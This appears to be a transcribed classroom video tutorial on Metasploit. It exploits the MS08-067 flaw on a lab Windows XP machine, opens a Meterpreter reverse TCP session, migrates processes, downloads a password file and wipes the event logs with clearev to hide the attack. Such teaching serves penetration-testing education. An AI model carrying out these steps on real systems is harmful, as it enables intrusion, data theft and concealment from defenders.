 Hello all yesterday we saw two tools that Nmap and Nessus they have been detecting the vulnerability present in the system but to be sure of that vulnerability we will try to exploit that vulnerability using MetaSprite. So today's demo is all about MetaSprite. So let's begin with I have two operating system one is the one to one which we are using and the other is Windows XP. This is our target system on which the vulnerability is actually present. So this operating system is Microsoft Windows XP service pack one. So let's find out the IP address of this system so that we can figure out we can attack it. So to get the IP address of Windows XP we will use ipconfig in the command prompt. So we will go to the command prompt ipconfig and we will get the IP address of the system which is 10 129 156 and 216. Similarly we can get the IP address of our machine from which we are attacking for that we will use ipconfig and the IP address of our system is 10 129 2660 and to be sure of that the target system is indeed live we will just try to ping it. So when we ping this we will hopefully get some reply. So we are indeed getting the reply that means that system is available. Now to start the Metasploit we will have to give the command msf console but that we need to do in super user mode. So we will give sudo msf console after giving the password this will take some time but we are skipping time so sometimes this will start and once it starts it will show here that in its current database it has 1290 exploits that means they are in total 1 around 1300 exploits to be target we can target them. So to get the list of all the commands that are there we can use help ok. So here is the command show exploit which will actually load all the exploits in its database so that we can search it later. So this will load all the exploits and it will list indeed. So we can see the exploits that they are some of the exploits like buffer overflow so they are I am highlighting them some of them. So this is soft remote buffer overflow attack it is present on windows system and they another exploit. Now yesterday we saw that on scanning this system with Nessus we are finding we found that there is a exploit with the name ms08067 so let us indeed search that exploit whether it is present in the admittus plate or not it is indeed there so this is the complete path of that exploit. So we will try to attack our windows system using this exploit only in this demo. So we will just copy that exploit and we can use the command use which will actually load that exploit and we will work with it further. So this prompt is changed to this exploit name so initially it was msf now it changed to msf with the exploit name. We can type the command info which will give the list give all its all the information of this about this exploit. So here is the name of the exploit so this is regarding stack corruption and its platform is windows that means it is available this exploit is only available in windows and this rank grade means that there is a high probability that actually we can attack this system also it shows the available target so this is a list of all the operating systems along with their service pack in which this exploit is present vulnerability is present and our system which is windows xp sp1 is indeed in this list so we can attack that. There are some options which we need to fill which I will tell you later and this is a small description of this vulnerability so it says that there is a bug in the code netapi32.dll which is which actually which is which we exploit so we will give a command show options which will tell what all options we need to fill so here we need to give three options R host, R port and SMB pipe but R port and SMB pipe has already given being given a default setting default value so we will keep that and we will just give the value R host which is the target address. So we initially saw the target IP address which is which is 10 129 156 216 so we will again give that so we will set this R host to the given IP address. Now to exploit any system we need to send some piece of code to that system so in Metasploit one very good such code is Metaprita so that piece of code is actually called payload so we will set the payload to the meta to use we will instruct the Metasploit to use the payload with windows Metaprita reverse TCP so this will actually go into the target system using that vulnerable backdoor and it will try to create a connection between the two systems so also we need to give some options to this Metaprita code as well which we can again see using show options so here we are seeing that L host is currently empty and L host is the listen address so we need to give the IP address of our system from which we are taking so we already calculated that figured out that using IF config so this is 10 129 2660 so we will set this L host so now we are ready to attack just to be sure that all the options are filled so we will use show options and that indeed all the options are filled so we will exploit this using exploit and this says that Metaprita session one is open that means that exploit is indeed successful and we have successfully entered into the target system and there are whole lot of commands in Metaprita as well so this is a list of all the commands in the Metaprita I will again you can get this list using help or question mark so I will again highlight some of those which is help then info is there then migrate is there which tells that you can actually migrate your Metaprita code to some stable process so there is get PID which will get the current process identifier in which this Metaprita is actually attached then there is execute command the shell will actually open that window shell for us and also there is one command PS which will list all those processes in running in that window system so this is the PS which will list the running process in the window system so we will use that these all are the processes running in that targeted system so we can see that windows process are listed here so indeed we are in that system so we will use get PID to get the process identifier which is 988 so we can search that this 988 is actually attached to SVC host but there is one thing I mean this SVC host is not very stable process and it randomly changes into some other process so it might be possible that this Metaprita code gets out of this so to quickly migrate this Metaprita to some stable process we will use migrate and we can migrate it to a process explorer.exe which is quite stable and which always runs in the window system so we will migrate this and this migration is from 988 to 1420 PID which is successful so now the Metaprita code is running in 1420 that is inside the explorer.exe so now we will use command shell which will actually opens a window shell so here is the window shell which you must be familiar with once we are into that system we can use all those commands which we can use in windows command prompt like dir which will list all the directories for this demo I have created one secret information file in this in my windows XP so that is present in C with the name secretinfo.txt and let us say this contains a password with a password at the rate 1 to 3 of some application so let us try to get this file from this oven to metasploit so we will go into the C prompt and then there is the file secretinfo.txt so once we are sure that we have that secretinfo.txt will exit from Metaprita and will use a command download which will download the file from that operating system to our machine so this is the secretinfo.txt and we are downloading it in our home folder so this download is successful and now we can actually see whether this is in our system or not so we will just go in the home folder and there is the file secretinfo.txt so when we will open it will be the it will have the same contents as the previous we will just show in this windows XP so this is the this contains the password so in this way you can actually exploit any system which has this vulnerability and it will actually give the information give any secret information on that system now there is one more important thing any thing we try to do in windows system this will be logged in events management so windows event management will log all the relevant information but that happens that does not happen in almost all operating system so this is an event viewer so in event viewer there are three things application security and system so currently this security tab has some of the logs that this system has tried to that some other process has tried to enter that system because we have not done any other thing in the XP so this must be some vulnerable thing so meta-preter is a great command which will try to delete which will delete all the events from that windows operating system which so that no one can actually know that it has been exploited so that command is clear EV so this will wipe all the records from the windows system so it is saying that it has wiped six records from security so we can see that now when we will refresh this all the events have been wiped so that means there is no information that this system has been attacked but it has actually so this ends our tutorial on meta-preter thank you.